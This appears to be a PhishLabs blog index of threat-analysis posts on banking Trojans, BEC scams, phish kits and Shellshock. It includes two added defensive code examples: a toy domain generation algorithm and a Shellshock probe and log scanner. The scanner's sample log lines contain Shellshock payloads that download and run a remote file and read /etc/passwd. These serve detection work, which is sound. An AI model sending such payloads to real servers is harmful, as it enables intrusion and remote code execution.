The PhishLabs Blog

From Macro To Mitigation: An Analysis of TrickBot's Lifecycle


Since the identification of TrickBot in late 2016, we have observed it targeting bank customers throughout the United States, United Kingdom, Germany, Australia, and Canada, following an attack pattern similar to that of Dyre, the Trojan from which it was developed. TrickBot enters a victim's machine and sends banking information to criminals through a complex series of events initiated by a single click. Once initiated, TrickBot resides in the background, operating as unobtrusively as possible. While the process, from installation to credential theft, can take only seconds, TrickBot follows discrete linear steps, each of which provides an opportunity for mitigation.


Topics: Threat Analysis, Threat Intelligence, Banking Trojan, TrickBot

Dissecting the Qadars Banking Trojan

Posted by Raashid Bhat on Feb 22, '17

Qadars is a sophisticated and dangerous Trojan used for crimeware activities including banking fraud and credential theft. Qadars targets users through exploit kits and is installed using PowerShell scripts. We have observed Qadars targeting multiple well-known banks in the UK and Canada; it is capable of stealing infected users' two-factor authentication codes and banking credentials through the deployment of webinjects. While not as well known or widespread as other Trojans, its operators have shown commitment to developing Qadars' on-board evasion techniques and its advanced and adaptable privilege escalation module. This emphasis on persistence, alongside frequent shifts in both industry and geographic targeting, indicates that Qadars will remain a potent threat through 2017.

Topics: Threat Analysis, Threat Intelligence, Banking Trojan, Qadars

Vawtrak / Neverquest2 adopts new methods to increase persistence

Posted by King Salemno on Aug 5, '16

At the end of July, the PhishLabs Research, Analysis, and Intelligence Division (R.A.I.D.) found two major changes in the codebase of Vawtrak (a.k.a. Neverquest2) that significantly increase the banking Trojan's persistence and the risk it poses to victims. The newest iteration of Vawtrak now uses a domain generation algorithm (DGA) to locate its command and control (C2) server. Because the domains are derived from an algorithm rather than hardcoded, blocking or sinkholing a fixed list of domains is no longer sufficient: the list must be regenerated for every period the algorithm covers. Additionally, this new DGA implementation is bundled inside a codebase that appears smaller and more efficient, possibly because of compiler optimization. That optimization prevents malware researchers from reusing their established Vawtrak analysis techniques during reversing to assist with mitigation of the threat.
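To make the blocklist problem concrete, here is an added example (not Vawtrak's actual DGA, which this post does not publish, and not PhishLabs code) of a toy date-seeded DGA. The seed constant, the TLD set, the eight-domains-per-day schedule and the observation dates are all assumptions. It shows why a blocklist built from domains seen on one day catches nothing a few days later, and how a defender who has reversed the algorithm can instead regenerate the list on a rolling basis:

```python
"""Toy domain generation algorithm (DGA) and the blocklist problem it causes.

Added illustration, not Vawtrak's real DGA: the seed, the TLDs and the
per-day domain count are assumptions chosen for the example.
"""
from __future__ import annotations

import hashlib
from datetime import date, timedelta

SEED = b"example-campaign-seed"   # assumed: a per-build constant in the sample
TLDS = ["com", "net", "biz"]      # assumed
DOMAINS_PER_DAY = 8               # assumed


def generate_domains(day: str, count: int = DOMAINS_PER_DAY, seed: bytes = SEED) -> list[str]:
    """Derive the candidate C2 domains for one calendar day (ISO 'YYYY-MM-DD').

    Each domain is a pure function of (seed, date, index), so the bot and a
    defender who has reversed the algorithm compute the same list.
    """
    date.fromisoformat(day)  # validate the input format
    domains = []
    for i in range(count):
        digest = hashlib.sha256(seed + day.encode() + bytes([i])).digest()
        label = "".join(chr(ord("a") + b % 26) for b in digest[:12])
        tld = TLDS[digest[12] % len(TLDS)]
        domains.append(f"{label}.{tld}")
    return domains


def static_blocklist_hits(blocklist: set[str], today: str) -> int:
    """How many of today's C2 candidates a fixed blocklist still catches."""
    return sum(1 for d in generate_domains(today) if d in blocklist)


def rolling_blocklist(today: str, days_ahead: int = 7) -> set[str]:
    """Blocklist a defender regenerates daily once the DGA is reversed:
    today's domains plus a window of future days, so pre-registered
    C2 domains are covered before the bot rolls over to them."""
    start = date.fromisoformat(today)
    names: set[str] = set()
    for offset in range(days_ahead + 1):
        names.update(generate_domains((start + timedelta(days=offset)).isoformat()))
    return names


if __name__ == "__main__":
    seen = "2016-07-25"     # constructed: the day a C2 domain was first observed
    today = "2016-07-28"    # constructed: three days later
    hardcoded = set(generate_domains(seen))
    print("static list hits today:", static_blocklist_hits(hardcoded, today))
    print("rolling list hits today:", static_blocklist_hits(rolling_blocklist(today), today))
```

The static list scores zero after the rollover while the regenerated list covers every candidate; the operational lesson is that once the algorithm and seed are recovered from a sample, the defender's job becomes scheduling regeneration, not collecting sightings.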


Topics: Threat Analysis, Threat Intelligence, Vawtrak, Banking Trojan, Neverquest2, Malware Analysis, R.A.I.D.

Olympic Vision Keylogger and BEC Scams

Posted by Eris Maelstrom on May 24, '16

During a recent analysis of a business email compromise (BEC) scam, we observed a lure attempting to install the Olympic Vision keylogger. Further research determined that this keylogger and the accompanying Olympic Vision crypter were used in a larger campaign targeting multiple organizations with a variety of lures, including fake invoices and shipment confirmations. The campaign appears to originate from South Africa and uses both maliciously registered free domains and compromised domains.


Topics: Malware, Threat Analysis, Threat Intelligence, BEC, business email compromise

How to make the most of reported phishing emails... Even if there are way too many

Posted by Joseph Opacki on May 19, '16

You’ve done it.

After months of nagging, security awareness training, and constant reminders, your employees have started reporting phishing emails. Take a moment to pat yourselves on the back, because this is no mean feat.

But… now what? What do you actually do with all these reported emails?


Topics: Phishing, Threat Analysis, Threat Intelligence, Spear Phishing

Examining a New Cybercrime OPSEC Technique (And How to Break It)

Posted by Jason Davison, Threat Analyst on May 17, '16

The techniques cybercriminals use are becoming more advanced. They are going to greater lengths to commit fraud, compromise computers, and steal credentials. The time, money, and effort attackers invest in crafting attacks makes it important for them to protect their work from being stolen by others, and to extend the life of their operations by evading technical analysts and investigators.


Topics: Phishing, Threat Analysis, Strategy

2016 Phishing Trends & Intelligence Report: Hacking the Human

Posted by Joseph Opacki on Feb 25, '16

Today we published the 2016 Phishing Trends & Intelligence Report: Hacking the Human. We are proud that this report provides a first-hand, in-depth view of phishing drawn directly from the continuous work PhishLabs™ does to fight back against phishing attacks and the threat actors behind them.

It was researched and written by our own PhishLabs R.A.I.D.™ (Research, Analysis, and Intelligence Division), which is made up of some of the world's most respected threat researchers. The information and analysis in this report came directly from our operations and the technology systems we use to fight back against phishing attacks. We analyzed more than one million confirmed malicious phishing sites in 2015, residing on more than 130,000 unique domains.


Topics: PhishLabs, General, Threat Analysis, Company News, Phishing Trends and Intelligence Report

New Phish Kit Backdoor Techniques: "The Dufresne" and "The Vezzini"

The market for pre-made phishing kits is thriving. Think of a financial institution, email provider, or e-commerce site, and someone somewhere has undoubtedly created a pre-packaged collection of the files needed to stand up a fake site designed to harvest personal and financial information from unsuspecting victims. These kits are often sold in Dark Web marketplaces or underground hacking forums, but they are also commonly distributed for free on various social media sites.


Topics: Phishing, Threat Analysis, Phish Kit

Mitigating the Impact of Shellshock on Financial Institutions

With the recent discovery of the Shellshock bug, many banking institutions are left wondering what the implications are for the financial industry and how to begin securing their systems. In this post, we address common questions and mitigation tactics that banking entities can use to reduce the risk of exploitation via the Shellshock vulnerability.
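As an added example (not code from the original post), here are two checks a bank's security team can run while working through the mitigations: a local probe of the installed bash, and a sweep of web server access logs for exploitation attempts. The facts relied on are that Shellshock (CVE-2014-6271) let bash execute commands appended to a function definition stored in an environment variable, and that CGI hands HTTP headers to scripts as environment variables, so a header beginning with `() {` is the usual delivery vector. The log lines, IP addresses and hostnames are constructed samples:

```python
"""Two Shellshock checks: a local bash probe and a web-log sweep for CGI attempts.

Added example, not code from the original post. The log lines below are
constructed samples; the IPs and hosts in them are made up.
"""
from __future__ import annotations

import os
import re
import shutil
import subprocess

# The classic probe: a function definition with trailing commands in an env var.
# Patched bash ignores the trailer; vulnerable bash runs it on startup.
PROBE = "() { :;}; echo VULNERABLE"

# Function-definition prefix that Shellshock abused; bash allows optional
# whitespace between "()" and "{", so the regex does too.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def local_bash_vulnerable() -> bool | None:
    """True if the local bash executes the trailing command, False if patched,
    None if bash is not installed at all."""
    if shutil.which("bash") is None:
        return None
    env = {"PATH": os.environ.get("PATH", ""), "x": PROBE}
    out = subprocess.run(["bash", "-c", "echo probe"], env=env,
                         capture_output=True, text=True, timeout=10)
    return "VULNERABLE" in out.stdout


def find_shellshock_attempts(log_lines: list[str]) -> list[dict]:
    """Scan combined-format access log lines for the "() {" signature anywhere
    in the request line, referer or user-agent, and report source and UA."""
    hits = []
    for n, line in enumerate(log_lines, start=1):
        if SHELLSHOCK_RE.search(line):
            src = line.split(" ", 1)[0]
            # Last quoted field in combined log format is the user-agent.
            m = re.search(r'"([^"]*)"\s*$', line.rstrip())
            hits.append({"line": n, "src": src, "ua": m.group(1) if m else ""})
    return hits


# Constructed sample lines in Apache/nginx combined log format.
SAMPLE_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \'wget http://198.51.100.7/x -O /tmp/x; sh /tmp/x\'"',
    '198.51.100.20 - - [25/Sep/2014:10:01:13 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" '
    '"Mozilla/5.0 (Windows NT 6.1) Gecko/20100101 Firefox/32.0"',
    '203.0.113.9 - - [25/Sep/2014:10:02:40 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 '
    '"() { ignored;}; echo; /bin/cat /etc/passwd" "curl/7.38.0"',
]

if __name__ == "__main__":
    print("local bash vulnerable:", local_bash_vulnerable())
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['src']} sent {hit['ua']!r}")
```

The log sweep flags the third line even though its user-agent is an ordinary curl string, because the payload rides in the referer; any header that the CGI layer exports is a candidate, so the signature is applied to the whole line rather than to one field. A patched host returns False from the probe; a True result on any internet-facing CGI host should be treated as an incident, not a patching ticket.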


Topics: Threat Analysis, Shellshock

Vawtrak Gains Momentum and Expands Targets

Vawtrak is the security industry's name for the latest version of the 64-bit-compatible Gozi Prinimalka Trojan, a malware family first conceived in the mid-2000s. Recently, PhishLabs' R.A.I.D. (Research, Analysis, and Intelligence Division) has uncovered new developments in the latest Vawtrak configurations that indicate it is a much more substantial threat than it was a few months ago.

What You Need to Know


Topics: Malware, Threat Analysis, Threat Intelligence, Trojan, ATO, Vawtrak


What's this all about?

The PhishLabs Blog is where we share our insights and thoughts on cybercrime and online fraud.
